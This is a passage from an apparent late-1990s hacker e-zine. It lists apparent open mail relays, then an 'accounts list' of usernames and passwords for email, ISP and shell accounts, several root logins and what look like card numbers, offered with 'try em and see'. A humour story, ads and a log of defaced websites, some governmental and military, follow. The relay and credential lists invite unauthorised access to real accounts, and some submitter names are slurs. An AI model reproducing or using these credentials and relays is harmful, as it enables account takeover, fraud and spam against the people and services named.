mail.versaversa.be [latency: 09/25/99 05:43:41 PDT by tt]
surabaya.wasantara.net.id [latency: 09/25/99 03:18:03 PDT]
204.143.102.68 [latency: 09/24/99 05:28:49 PDT by hiran]
161.200.192.1 [latency: 09/22/99 09:52:46 PDT]
smtp.netpathway.com [latency: 09/21/99 18:32:54 PDT by SycoKiddie]
library.shastacollege.edu [latency: 09/20/99 09:14:31 PDT by Capt. Krunch]
sandwich.net [latency: 09/18/99 04:28:34 PDT by BroS^ Inc ]
zoom.com [latency: 09/17/99 18:45:22 PDT by Pistor Joubert]
205.252.249.4 [latency: 09/16/99 01:52:38 PDT by The Mad1 (or Mad1)]
mail.worldinter.net [latency: 09/14/99 19:19:48 PDT by Animosity]
elitist.org [latency: 09/12/99 19:37:15 PDT by daniel shatter]
mail.dailypost.com [latency: 09/11/99 06:39:22 PDT by KaDoS HaRdCoRe 1488]
140.254.114.178 [latency: 09/10/99 17:19:40 PDT]
smtp.netzero.net [latency: 09/10/99 08:36:04 PDT]
smtp.mail.com [latency: 09/10/99 01:52:46 PDT by neron]
ibm.net [latency: 09/09/99 20:29:44 PDT by aNaS]
config2.il.us.ibm.net [latency: 09/09/99 20:29:22 PDT by aNaS]
patent.womplex.ibm.com [latency: 09/09/99 20:28:13 PDT by aNaS]
partners.boulder.ibm.com [latency: 09/09/99 20:27:37 PDT by aNas]
ncc.hursley.ibm.com [latency: 09/09/99 20:27:03 PDT by aNas]
mail.ichadmin.uk.ibm.com [latency: 09/09/99 20:26:42 PDT by aNas]
config1.il.us.ibm.net [latency: 09/09/99 20:26:20 PDT by aNaS]
bugtiz.com [latency: 09/09/99 20:24:40 PDT by aNaS]
anas17.net [latency: 09/09/99 20:23:59 PDT by aNaS]
mail.net-magic.net [latency: 09/09/99 17:21:08 PDT by this'n really works!]
smtp.apolloweb.net [latency: 09/08/99 12:52:07 PDT by aNaS]
anas17.com [latency: 09/08/99 12:50:47 PDT by aNAS]
smtp-gw01.ny.us.ibm.net [latency: 09/08/99 12:50:02 PDT by aNaS]
ultra.unt.se [latency: 09/06/99 16:53:47 PDT by Razzon]
130.91.28.211 [latency: 09/06/99 16:52:49 PDT by Razzon]
203.102.153.226 [latency: 09/06/99 16:52:30 PDT by Razzon]
sierrasource.com [latency: 09/06/99 14:05:42 PDT]
pop.casema.net [latency: 09/05/99 14:23:16 PDT]
maxking.com [latency: 09/04/99 17:06:49 PDT by AcidFire]
ns1.peoples.com.ar [latency: 09/02/99 21:13:37 PDT by Merry Michael]
hell.com [latency: 09/01/99 20:55:09 PDT by InsaneOne]
springfield.mec.edu [latency: 09/01/99 10:59:51 PDT]
hotpop.com [latency: 08/29/99 22:26:53 PDT by Scalpel]
164.109.1.3:22 [latency: 08/28/99 14:38:59 PDT]
mail.compuserve.com [latency: 08/28/99 03:08:25 PDT]
smtp.i.wanna.fuck.ur.mother.com [latency: 08/27/99 01:47:47 PDT by I Wanna Fuck Your Mo]
smtp.mail.com [latency: 08/27/99 01:46:54 PDT by Mail.Com User]
smtp.tm.net.my [latency: 08/27/99 01:45:47 PDT by TMNet User]
smtp.jaring.my [latency: 08/27/99 01:45:09 PDT by Jaring User]
pop.netsoc.ucd.ie [latency: 08/26/99 09:02:54 PDT]
pop.site1.csi.com [latency: 08/26/99 02:29:48 PDT by RuCKuS]
mail.cut.org [latency: 08/24/99 10:03:44 PDT by neron sux dick]
host.phc.igs.net [latency: 08/24/99 04:18:56 PDT]
smtp.phc.igs.net [latency: 08/24/99 04:17:19 PDT]
zeus.ax.com [latency: 08/23/99 21:27:05 PDT by Messiah]
smtp.ifrance.com [latency: 08/23/99 10:48:42 PDT by k-tEAR]
smtp.obase.com [latency: 08/21/99 18:34:14 PDT by Arthur Dent]
mail.hackers.com [latency: 08/21/99 13:48:52 PDT by ^Omega]
mail.porn.com [latency: 08/21/99 13:47:52 PDT by ^Omega]
wsnet.ru [latency: 08/21/99 05:27:04 PDT by telotrin]
ugansk.wsnet.ru [latency: 08/21/99 05:26:24 PDT by telotrin]
mail.ugansk.intergrad.com [latency: 08/21/99 05:17:33 PDT by telotrin]
smtp-khi2.super.net.pk [latency: 08/19/99 13:13:28 PDT by Manch]
graham.nettlink.net.pk [latency: 08/19/99 13:11:09 PDT by Manch]
mail.cut.org [latency: 08/19/99 11:14:08 PDT by néron]
mail.cyberamy.com [latency: 08/19/99 11:06:38 PDT]
mail.mendes-inc.com [latency: 08/19/99 04:40:45 PDT by RALPH]
zoooom.net [latency: 08/18/99 19:34:39 PDT by kopkila]
smtp.ozemail.com.au [latency: 08/16/99 07:58:10 PDT]
mailgw.netvision.net.il [latency: 08/14/99 23:04:29 PDT by Anton]
smtp.mail.ru [latency: 08/14/99 23:03:40 PDT by Anton]
purg.com [latency: 08/13/99 17:38:57 PDT]
jeg.eier.holmlia.com [latency: 08/13/99 05:24:16 PDT by Music-BoY]
saintmail.net [latency: 08/12/99 07:20:17 PDT by trinity]
pop.fast.co.za [latency: 08/12/99 07:19:21 PDT]
smtp2.zdlists.com [latency: 08/11/99 15:47:30 PDT by Razzon]
mail.eexi.gr [latency: 08/10/99 15:10:26 PDT]
mail.cyberamy.com [latency: 08/08/99 20:36:08 PDT by noname]
gilman.org [latency: 08/08/99 13:19:37 PDT]
mail.friendsbalt.org [latency: 08/08/99 13:19:21 PDT]
cache-rb03.proxy.aol.com [latency: 08/07/99 09:41:00 PDT by Buddy McKay]
merlin.sicher.priv.at [latency: 08/06/99 21:29:33 PDT by DeadWrong]
smtp.infovia.com.gt [latency: 08/06/99 17:22:27 PDT]
zoooom.net [latency: 08/06/99 11:14:00 PDT by CrazyNiga]
aol.net.pk [latency: 08/06/99 11:13:43 PDT by CrazyNigaq]
169.207.154.209 [latency: 08/05/99 22:02:06 PDT by Razzon]
cpqsysv.ipu.rssi.ru [latency: 08/04/99 01:31:17 PDT]
hell.org [latency: 08/03/99 21:41:46 PDT by Suid Flow]
205.188.192.57 [latency: 08/03/99 21:27:53 PDT by vegan_5]
216.192.10.4 [latency: 08/03/99 21:27:22 PDT by vegan_5]
mail.net-magic.net [latency: 08/03/99 16:18:49 PDT by Micheal Layland]
mail.sojourn.com [latency: 08/03/99 15:01:38 PDT by ZeScorpion]
mail.q-texte.net.ma [latency: 08/03/99 13:10:51 PDT by LeSaint]
mail.netvision.net.il [latency: 08/03/99 11:04:03 PDT]
fasolia-louvia.com.cy [latency: 08/03/99 02:27:46 PDT by blah]
mail.direct.ca [latency: 08/02/99 21:46:52 PDT]
Spacewalker.wanna.join.it.com [latency: 08/01/99 15:40:28 PDT]
mail.start.com.au [latency: 08/01/99 07:27:25 PDT by QuaKeee]
mail.vestelnet.com [latency: 08/01/99 07:26:41 PDT by QuaKeee]
205.149.115.147 [latency: 08/01/99 04:06:16 PDT by KeKoA]
bareed.ayna.com [latency: 07/30/99 07:03:24 PDT]
youthnet.org [latency: 07/30/99 01:11:21 PDT by vegan_%]
inext.ro [latency: 07/28/99 14:35:02 PDT by latency]
iccnet.icc.net.sa [latency: 07/28/99 14:02:54 PDT by none]
mail.eexi.gr [latency: 07/27/99 15:39:30 PDT]
mail.dnt.ro [latency: 07/27/99 01:00:59 PDT by DitZi]
mail.compuserve.com [latency: 07/26/99 13:11:15 PDT by CyberNissart]
pg.net.my [latency: 07/25/99 09:23:19 PDT by [X]r3Wt]
scholar.cc.emory.edu [latency: 07/24/99 14:49:04 PDT by Cougar]
imail.young-world.com [latency: 07/24/99 08:34:44 PDT by The Lord]
mail.cut.org [latency: 07/22/99 17:40:19 PDT by AniXter]
205.244.102.167 [latency: 07/22/99 14:47:28 PDT by Razzon]
relay.cyber.net.pk [latency: 07/22/99 03:24:48 PDT by crush2]
mail.lanalyst.nl [latency: 07/22/99 00:55:18 PDT by phobetor]
mail.lig.bellsouth.net [latency: 07/22/99 00:48:27 PDT by Deth Penguin]
batelco.com.bh [latency: 07/21/99 12:54:53 PDT by asswipe]
ns1.infonet-dev.co.jp [latency: 07/20/99 18:25:11 PDT by bokuden]
inext.ro [latency: 07/20/99 15:11:39 PDT by the_aDb]
siamail.sia.it [latency: 07/20/99 13:07:27 PDT by The Lord]
[ Accounts list (mainly bogus, some legit try em and see) ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
nyx.net login anon9085 : boss-007 [latency: 11/17/99 02:11:41 EST by Altazefuego]
www.kurtuluscephesi.com login turkiye : 123 [latency: 11/16/99 10:05:50 EST by se]
www.turkcell.com login unforgiven : 123 [latency: 11/16/99 10:02:50 EST]
www.super.net.pk login jbabu : give4take1 [latency: 11/15/99 21:02:42 EST by Vapour007]
www.hotmail.com login Abba66 : bu187 [latency: 11/15/99 21:01:01 EST by John ]
www.www.com login timmy1240 : johnny [latency: 11/15/99 17:41:44 EST by Toad]
www.hotmail.com login muffin_kitty : benjamin [latency: 11/15/99 17:34:47 EST]
www.hotmail.com login corrosive1 : shazia [latency: 11/15/99 00:32:21 EST]
NOTHING HERE WORKS.NOW login nothing : works [latency: 11/14/99 12:09:38 EST by handicapped]
hotmail.com login iluvit11 : iluvspam [latency: 11/13/99 14:24:41 EST]
www.visa.com login ANYBODY.... : PLEZZZZZZ [latency: 11/13/99 03:33:04 EST by dedoor@england.com]
www.super.net.pk login jbabu : give4take1 [latency: 11/12/99 13:01:45 EST]
hotmail.com login mkashif72 : 12345678 [latency: 11/12/99 08:52:18 EST by kashif]
www.hotmail.com login corrosive1 : shazia [latency: 11/12/99 06:56:32 EST]
www.hotmail.com login Abba66 : bu187 [latency: 11/10/99 14:21:12 EST]
www.aol.com login Sadow101 : Ajck214U [latency: 11/10/99 09:25:33 EST by Vapour007]
www.vvideo.com login fresh : video [latency: 11/10/99 09:21:50 EST by Vapour007]
www.18asiansluts.com login fast : love [latency: 11/10/99 09:21:07 EST by Vapour007]
www.super.net.pk login jbabu : give4take1 [latency: 11/10/99 09:17:53 EST by Vapour007]
www.digicom.com login asad : Apple2642 [latency: 11/10/99 09:16:42 EST by Vapour007]
www.cyber.net.pk login taj : zxcvbnm [latency: 11/10/99 09:14:00 EST by Vapour007]
www.celebritysexmatch.com login command : conquer [latency: 11/10/99 09:09:44 EST by Vapour007]
www.batelnet.bs login tiny : 719 [latency: 11/09/99 18:07:26 EST]
www.hotmail.com login adi_oli : iloveliviu [latency: 11/09/99 16:09:51 EST by BM-Freak]
www.tripod.com login radus : sefu [latency: 11/08/99 22:04:30 EST]
www.visa.com login I GOT IT : 4921010012520026 [latency: 11/08/99 14:49:00 EST by 03/2001]
www.visa.com login I GOT VISA : 4192010012520026 [latency: 11/08/99 11:20:31 EST by VISA]
www.mail.forum.dk login gugl1 : gugl1x [latency: 11/08/99 09:11:01 EST by whf]
Nyx.net login jexploit : exp-666 [latency: 11/08/99 07:15:46 EST by ExPl0iTeD]
www.visa.com login I NEED IT : PLEZZZZ [latency: 11/07/99 19:34:25 EST by Nick name]
member.babylon-x.com login shahbaz : 6671569 [latency: 11/07/99 19:31:50 EST]
hobbiton.org login shazbot : crazy [latency: 11/07/99 16:06:09 EST by badboy@dma.be]
hotmail.com login hacknvirii : airforce [latency: 11/07/99 02:43:37 EST by FLASH FIRE]
smtp tm.net login st34l3r : 29382 [latency: 11/07/99 02:19:09 EST by schrudine]
member.babylon-x.com login liveandhard : daycore [latency: 11/06/99 10:52:36 EST by Bob]
www.hotmail.com login fabian_de_ponte : atreides [latency: 11/05/99 11:38:35 EST by Elgevito]
www.hotmail.com login andrea_b_z : atreides [latency: 11/05/99 11:38:08 EST by Elgevito]
member.babylon-x.com login shahbaz : 6671569 [latency: 11/05/99 08:18:45 EST by lifetime]
www.caramail.com login spootnik1 : 1234 [latency: 11/05/99 01:39:59 EST by TheMaster]
intranet.reda.net login z-master : 0389775307 [latency: 11/05/99 01:39:10 EST by Caramel]
www.hotmail.com login cartermikey : holocaust [latency: 11/05/99 00:01:09 EST by Holocaust]
www.visa.com login I NEED IT : PLEZZZZ [latency: 11/04/99 07:14:25 EST by dedoor@england.com]
www.visa.com login I.NEED.VISA : I.NEED.IT [latency: 11/04/99 06:59:01 EST by I.NEED.VISA.NUMBER]
www.hotmail.com login metallicblue : 1234qwer [latency: 11/03/99 15:14:58 EST by yomismo]
midland.fp.k12.wa.us login 943527 : kawaii [latency: 11/03/99 12:10:19 EST by Ken Heianna]
www.homail.com login kalle : kabito [latency: 11/02/99 17:24:01 EST]
www.hotmail.com login hinatahir : 12345678 [latency: 11/02/99 03:55:38 EST by NOMI]
www.hotmail.com login abbas_bashir : daytec12 [latency: 11/01/99 12:25:26 EST by Guddo the great.]
www.hotmail.com login metallicblue : 1234qwer [latency: 10/31/99 15:01:22 EST by §ââÑ]
www.visa.com login Charls_Filart : Exp_3\01 [latency: 10/31/99 09:49:14 EST]
www.hotmail.com login simba2000 : bussemand [latency: 10/31/99 06:57:30 EST by EDITH]
www.hotmail.com login laisha_99 : 666 [latency: 10/31/99 00:59:01 EDT by Brandon]
www.linuxstart.com login havefunforfree : 123456789 [latency: 10/30/99 19:25:41 EDT by ViRiiTaS]
www.hotmail.com login brymbar : 5555 [latency: 10/29/99 19:05:05 EDT by Joint]
freejacksite.cjb.net login webmaster : fruitoftheloom [latency: 10/28/99 18:46:23 EDT by John]
www.visa.com login Charles _Filart : Exp_ 3/01 [latency: 10/26/99 11:40:36 EDT]
ftp.fortunecity.com login aaa : bbb [latency: 10/26/99 04:23:47 EDT by ccc]
ftp.fortunecity.com login Hack26 : jsmith [latency: 10/25/99 14:23:41 EDT by cRaZy_haC WHO ELSE!!]
209.67.136.174 login root : EMAIL ME IT!!!! [latency: 10/24/99 20:06:36 EDT by tha_ratt@hotmail.com]
shell.icon.co.za login compaq : scorer [latency: 10/24/99 05:57:50 EDT by system_85]
xs4all.nl login jeroendr : jeroen17 [latency: 10/22/99 16:48:39 EDT by jeroen]
xs4all.nl login xtc : xtc00 [latency: 10/22/99 16:48:10 EDT by xtc]
www.hotmail.com login pimppollo : dresanandres [latency: 10/21/99 16:05:24 EDT by Jigga Who?]
adults-online.com login billbill : billbill [latency: 10/21/99 13:45:19 EDT by not u]
www.hotmail.com login giorgiobel : armani [latency: 10/21/99 13:15:09 EDT]
freehome.myrice.com login kjn : heineken [latency: 10/21/99 10:56:46 EDT by su]
192.116.192.8 login elias2000 : leeee [latency: 10/20/99 20:47:53 EDT by elias]
catskill.net login pennie : randy [latency: 10/20/99 14:24:10 EDT by not u]
dandi.inext.ro login root : admin34 [latency: 10/20/99 03:15:51 EDT by Cristos]
www.nightmail.com login jammer97 : rustyvolvo [latency: 10/18/99 23:44:07 EDT by max]
cyber.net.pk login rehman : sexygirl [latency: 10/18/99 13:21:48 EDT by ivo]
mail.yahoo.com login dencoln : puma [latency: 10/17/99 23:26:49 EDT by d3nGoD]
netvision.net.il login root : adm353 [latency: 10/17/99 10:00:27 EDT]
batelco.com.bh login user : batelco [latency: 10/16/99 16:20:51 EDT by hacker]
grex.cyberspace.org login psybi : cyber69p [latency: 10/15/99 22:15:51 EDT by Psycho Bitch]
www.visa.com login Charls_Filart : Exp_3\01 [latency: 10/15/99 16:00:41 EDT]
www.hotmail.com login hananboro : gal92792 [latency: 10/15/99 10:10:31 EDT by peace]
www.infohack.org login secreto : WARNING [latency: 10/15/99 07:10:05 EDT by hedg]
usa.net login fasaraxs : 77fasaraxs77 [latency: 10/14/99 19:56:47 EDT by ad]
ftp.pioneeris.net login thunderz : vinnie [latency: 10/14/99 17:49:01 EDT by CRTLBL1159]
microsoft.com login skyhawk : 07011971 [latency: 10/14/99 15:38:31 EDT]
www.dalnet.com login houhou : nounou [latency: 10/12/99 14:59:04 EDT by haissam]
@HWA
-=----------=- -=----------=- -=----------=- -=----------=-
0
0
0
o
O O O
0
=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ _ _ _
/\ | | | | (_) (_)
/ \ __| |_ _____ _ __| |_ _ ___ _ _ __ __ _
/ /\ \ / _` \ \ / / _ \ '__| __| / __| | '_ \ / _` |
/ ____ \ (_| |\ V / __/ | | |_| \__ \ | | | | (_| |
/_/ \_\__,_| \_/ \___|_| \__|_|___/_|_| |_|\__, |
__/ |
|___/
*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************
When people ask you "Who is Kevin Mitnick?" do you have an answer?
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE EVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
http://www.2600.com/ http://www.kevinmitnick.com
+-----------------------------------------------------------------------------+
| SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE |
| =================== http://smog.cjb.net/ NEWS on SECURITY |
| NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET |
| http://smog.cjb.net/ NEWS on TECHNOLOGY |
+-----------------------------------------------------------------------------+
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
* http://www.csoft.net" One of our sponsers, visit them now www.csoft.net *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
// or cruciphux@dok.org //
//////////////////////////////////////////////////////////////////////////////
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
Send in submissions for this section please! ............c'mon, you KNOW you
wanna...yeah you do...make it fresh and new...be famous...<sic>
Hacker Horror 1:
"Tell-Tale Voltage Regulator"
Late one night, in the basement of his work, Harold was recompiling his
kernel for the 15th time that week.
"Maybe one day, I'll have a kernel that works!" thought Harold. One of
Harold's problems was that he only had a 386DX25 with 4 megs of ram to
work with. The accountants all got the P166's with 32 megs of ram.
After the compile was completed he installed it and proceeded to reboot
his system. Everything appeared to be working normally, except for one
thing...
"FOR CRYING OUT LOUD!!, I forgot to compile the crappy ethernet card
support!!" In frustration, Harold slammed his fist down on the keyboard,
then lifted the monitor and threw it across the room. As the small fire
created by the exploding monitor burned down, he realized what he
had done. His boss would kill him if he found out! There was only one
thing to do... hide the evidence and claim that his monitor had been
stolen!
Luckily, they were doing some work on the Second floor, and one of the
walls was not yet completed. Harold threw the monitor onto a push cart and
put a box over it. He knew that no one should be in the building, but just
in case. He got to the elevator without anyone seeing him. He pushed
the elevator call button and waited for what seemed to be an eternity.
Finally the elevator opened.
"Hey Harold, how's it going?"
FOR PETE'S SAKE! It was security... "Uh, nothing much, just taking this up
to 2nd floor to replace a monitor one of the secerataries said had a color
problem."
It sounded good, good enough. The security guard looked at Harold, for a
minute he thought something, Harold looked very white, and was sweating
profusely. But then, he was a typical hacker, so that didn't mean
anything. "Alright, just be sure to lock the doors behind you..."
Harold boarded the elevator and pressed 2. Now that he had passed the
security guard, nothing should stand in his way.
On the second floor, there was a section of wall that wasn't quite done
yet. Harold threw the broken monitor in there, and quickly threw up a
piece of drywall and nailed it down. Using skills he had learned from his
father, a carpenter, he quickly spread the plaster all around,
liberally. He didn't think that anyone would notice that the wall had
gotten done early... he ran past one of the secerataries desks and opened
the drawers... sure enough, he found a hair dryer. He used the hair dryer
to quickly dry the plaster... grabbed a power sander and finished the job.
Last but not least he grabbed a vaccuum and sucked up all the dust.
"But what is it missing??" Paint. He needed paint, but he couldn't find
any. Quickly he found a post it note and scrawled in his best handwriting
(the best handwriting for a hacker anyway) 'BOB, I FINISHED THE WALL,
COULDN'T FIND PAINT..'. Never mind the fact he didn't know who Bob
was, but there was always a Bob working somewhere, so it sounded good.
Harold got back on the elevator and made it back to his room safely... he
wrote a note to his boss that his monitor had been stolen and went home.
The next day Harold came in to work and was greeted by his boss.
"Monitor stolen?", his boss questioned him about it. Harold told him that
he had left the room unlocked accidently and probably someone from
Maintenence took it. He looked as convincing as he could. "Okay" the boss
said, "Get one out of storage, I hope you don't mind using an EGA
monitor for a while, it's all we've got left..". Doesn't matter, thought
Harold, I only use text based OSs anyway. "Oh and by the way, Harold, a
seceratary up on the second floor says that he can't see the network, can
you look into it?"
"Sure, I'll go right up". As Harold boarded the elevator, he thought of
how clever he was to get out of trouble. He especially had a big smile on
his face when he reached the second floor and saw Maintenence painting
that wall. He went over to the secerataries desk and found that the
guy's network connection had been removed. No big deal. He went back down
the hall, but something stopped him. From behind the wall where he had hid
the monitor, he heard a slight and high pitched "Whiiizzzzzzzzz". He
thought about it for a moment... but nah... couldn't be...
Later that evening as he was about ready to type make zlilo for the 16th
time, his boss popped in his office and said, "They're having network
problems again, and this time it's not the cable being unplugged...".
"Okay, I'll look into it." Harold quickly hit return, and left the room.
There is nothing I could have forgotten in the kernel this time, I have
everything supported... HAHAHAHA! As he walked past his wall, he again
heard the slight, "Whiiizzzzzzzz" from behind the wall. He thought
about it for a moment as the security guard walked up... "Funny thing your
monitor being stolen... I didn't see anyone but you here all last night!"
"Listen, perhaps if you had been doing your job a little better I would
still have a monitor!" Harold shouted back. The security guard was taken
aback. The whiiizzzz became louder.
"What's that noise?" Harold demanded. The security guard looked puzzled.
"Harold, you are wierd." the security guard left. Harold continued on to
the problem computer.
"Why isn't this seeing the network, all the drivers are loading properly!"
He checked the connections, he checked the hub, and he even replaced the
NIC. As he turned off the computer to reboot, the high pitched whiiizzz
became very loud.... "CUT IT OUT!!" Harold shouted. No one could
hear him because no one was there. Harold ran to one of the maintenence
walls and flipped the breaker to turn off all of the power on that floor.
The whiiiizzz noise only became louder. He turned the power back on and
grabbed a fire axe from the wall, setting off the fire alarm. But Harold
couldn't hear the fire alarm. All he could hear was the Monitor from hell,
it's noises raging from behind the wall. He took the axe and chopped down
the wall. "DAMN YOU! I WILL KILL YOU ONCE AND FOR ALL!!" The security
guard rushed up behind him and startled Harold.
"What the hell do you think you are doing??" demanded the security guard.
Harold didn't even look at him, he kept chopping at the wall. The security
guard was perplexed, so he drew his weapon. "I ORDER YOU TO STOP NOW
HAROLD!!".
Harold pleaded "I HAVE TO MAKE IT STOP!! I HAVE TO MAKE IT STOP!!"
"Make what stop?"
"The Monitor, IT WON'T QUIT!! IT IS TRYING TO DRIVE ME INSANE!!". The
security guard was speechless and didn't know what to do. Harold kept
chopping at the wall. Finally it caved in, Harold climed in the wall and
grabbed the monitor.
"HAHAHA! I HAVE YOU NOW YOU MONITOR FROM HELL!!!!". That was the last
thing Harold said before he discharged the High Voltage area across his
hand. The charge went up his arm, and into his brain. Harold colapsed...
-epilogue-
Harold woke up in the hospital.. still shaken. He didn't know what had
happened, the shock had made him forget. After he left the hospital, he
went back to work. His boss felt sorry for him and gave him his old job
back, but had hired someone to take his place in his abscense.
Harold went downstairs to his computer and flicked the switch to turn it
on.
The computer breathed to life, Harold was pleased to be back where he
belonged, in front of a computer. They even fixed his monitor, and he had
a brand new 15" SVGA monitor. He turned around to get a can of jolt out of
the 'frige and when he turned back, Harold screamed in horror. A
scream so loud that it could be heard clear to the 5th floor. For his
monitor was displaying something that could not be explained, something
that terrified him past all sanity.
His monitor was saying "Starting Windows 95...."
@HWA
SITE.1
http://www.xteq.com/products/xset/
X-Setup windows hacker
Cool product (its FREE) for Windows 9x users, this utility Xsetup
is similar in function to TweakUI only has a lot more options and
also has plugins. Well worth checking out. Site was a little slow
I found that downloading from the 'softwareforfree' links was the
best bet for thru-put.
You can Send in submissions for this section too if you've found
(or RUN) a cool site...
@HWA
H.W Hacked websites
~~~~~~~~~~~~~~~~
___| _ \ |
| __| _` |\ \ / | | __| _ \ _` |
| | ( | ` < | | | __/ ( |
\____|_| \__,_| _/\_\\___/ _| \___|\__,_|
Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
Hacker groups breakdown is available at Attrition.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
check out http://www.attrition.org/mirror/attrition/groups.html to see who
you are up against. You can often gather intel from IRC as many of these
groups maintain a presence by having a channel with their group name as the
channel name, others aren't so obvious but do exist.
>Start<
Defaced domain: www.safeandsecure.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/08/www.safeandsecure.net
Defaced by: highkidz
Operating System: Linux
Date 11/09/99
Defaced domain: www.synrgy.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/08/www.synrgy.com
Defaced by: Foam
Operating System: Windows NT (IIS/4.0)
Date 11/09/99
Defaced domain: www.ntinow.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/08/www.ntinow.com
Defaced by: Foam
Operating System: Windows NT (IIS/4.0)
Date 11/09/99
Defaced domain: biosys.bre.orst.edu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/biosys.bre.orst.edu
Defaced by: Narcissus
Operating System: Windows NT (IIS/4.0)
Date 11/09/99
Defaced domain: www.inlis.gov.sg
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.inlis.gov.sg
Defaced by: Sarin
Operating System: Windows NT
Date 11/09/99
Defaced domain: www.samofa.gov.sa
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.samofa.gov.sa
Defaced by: Sarin
Operating System: Windows NT (IIS/4.0)
Date 11/09/99
Defaced domain: devens-www.army.mil
mirror: attrition.org/mirror/attrition/1999/11/09/devens-www.army.mil
Defaced by: unknown
Date 11/09/99
Defaced domain: www.rmd.belvoir.army.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.rmd.belvoir.army.mil
Defaced by: hV2k
Operating System: Windows NT
Date 11/09/99
Defaced domain: lickass.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/lickass.net
Defaced by: cowhead2000
Operating System: Linux (Apache 1.3.6)
Date 11/09/99
Defaced domain: www.timmonsmicro.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.timmonsmicro.com
Defaced by: sSh
Operating System: Linux (Red Hat) (Apache 1.3.3)
Date 11/09/99
Defaced domain: www.aiasp.com.tw
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.aiasp.com.tw
Defaced by: DHC
Operating System: Windows NT (IIS/4.0)
Date 11/09/99
Defaced domain: uranos.rz.uni-osnabrueck.de
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/uranos.rz.uni-osnabrueck.de
Defaced by: Narcissus
Operating System: Windows NT (Apache 1.3.6 Win32)
Date 11/09/99
Defaced domain: www.safeandsecure.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.safeandsecure.net
Defaced by: sSh
Operating System: Linux (Red Hat) (Apache 1.3.3)
Date 11/09/99
Defaced domain: www.cmssoft.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.cmssoft.com
Defaced by: w0lf
Operating System: Irix (Rapidsite/Apa-1.3.4 FrontPage)
Date 11/09/99
Defaced domain: correo.inta.gov.ar
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/correo.inta.gov.ar
Defaced by: hacking 4 ponies
Operating System: Linux
Date 11/09/99
Defaced domain: linukz.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/linukz.net
Defaced by: R3dPriest
Operating System: FreeBSD 2.2.1 - 3.0 (Apache 1.2.6)
Date 11/09/99
Defaced domain: w3.pica.army.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/w3.pica.army.mil
Defaced by: hV2k
Operating System: Windows NT (IIS/4.0)
Date 11/10/99
Defaced domain: www.omh.state.ny.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.omh.state.ny.us
Defaced by: hV2k
Operating System: Windows NT (IIS/4.0)
Date 11/10/99
Defaced domain: www.cbacareer.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.cbacareer.com
Defaced by: kryptek
Operating System: Solaris 2.5x (Netscape-Enterprise/3.0C)
Date 11/10/99
